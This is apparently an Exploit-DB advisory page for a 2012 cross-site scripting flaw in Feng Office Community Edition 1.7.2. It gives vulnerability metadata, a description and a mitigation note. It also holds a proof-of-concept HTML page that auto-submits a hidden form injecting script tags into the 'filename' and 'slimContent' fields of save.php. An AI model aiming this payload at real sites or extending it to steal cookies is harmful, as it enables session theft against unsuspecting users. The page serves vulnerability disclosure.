header-logo
Suggest Exploit
vendor:
Feng Office Community Edition
by:
Javier Vicente Vallejo
7,5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Feng Office Community Edition
Affected Version From: 1.7.2
Affected Version To: 1.7.2
Patch Exists: YES
Related CWE: N/A
CPE: a:fengoffice:feng_office_community_edition
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Feng Office Community Edition Cross-Site Scripting Vulnerability

Feng Office Community Edition is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Mitigation:

Updates are available. Please see the references for more information.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47049/info

<html> 
<body onload="document.forms[0].submit()"> 
<form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php"> 
<input type="hidden" name="filename" value=""><script>alert(0)</script>" /> 
<input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" /> 
</form> 
</body> 
</html>